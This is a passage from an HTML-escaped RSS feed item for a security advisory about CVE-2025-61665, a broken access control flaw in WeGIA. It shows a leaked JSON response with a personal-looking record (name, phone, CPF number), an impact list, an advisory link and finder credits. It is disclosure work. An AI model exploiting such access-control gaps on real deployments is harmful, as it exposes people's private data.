&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Keep-Alive: timeout=5, max=100
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: Keep-Alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: text/html; charset=UTF-8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;[{
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt; &amp;amp;#34;nome&amp;amp;#34;: &amp;amp;#34;Luis Barango&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt; &amp;amp;#34;telefone&amp;amp;#34;: &amp;amp;#34;(71)98642-1278&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt; &amp;amp;#34;cpf&amp;amp;#34;: &amp;amp;#34;649.659.320-56&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt; &amp;amp;#34;valor_periodo&amp;amp;#34;: &amp;amp;#34;5000.00&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt; &amp;amp;#34;email&amp;amp;#34;: &amp;amp;#34;teste@teste.com&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt; &amp;amp;#34;tipo&amp;amp;#34;: &amp;amp;#34;F\u00edsica - Mensal - Boleto&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt; &amp;amp;#34;status&amp;amp;#34;: &amp;amp;#34;Ativo&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt; &amp;amp;#34;tag&amp;amp;#34;: &amp;amp;#34;Solicitante&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;}]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-61665/image.png&amp;#34;
width=&amp;#34;1534&amp;#34;
height=&amp;#34;431&amp;#34;
srcset=&amp;#34;/p/cve-2025-61665/image_hu_14ad2691788bd7c6.png 480w, /p/cve-2025-61665/image_hu_16f20d6fda007cbd.png 1024w&amp;#34;
loading=&amp;#34;lazy&amp;#34;
class=&amp;#34;gallery-image&amp;#34;
data-flex-grow=&amp;#34;355&amp;#34;
data-flex-basis=&amp;#34;854px&amp;#34;
/&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Broken Access Control vulnerabilities can have severe consequences, including:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Unauthorized access to restricted functionality;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Escalation of privileges for low-level users;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Exposure of sensitive data and potential system compromise;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Loss of confidentiality and integrity of educational records;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Reputational damage to the organization.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-62wp-6qmh-6p5f&amp;#34; target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
&amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-62wp-6qmh-6p5f&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34; target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
&amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
loading=&amp;#34;lazy&amp;#34;
/&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34; target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
&amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34; target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
&amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;</content:encoded><pubDate>Tue, 30 Sep 2025 00:00:00 +0000</pubDate></item></channel></rss>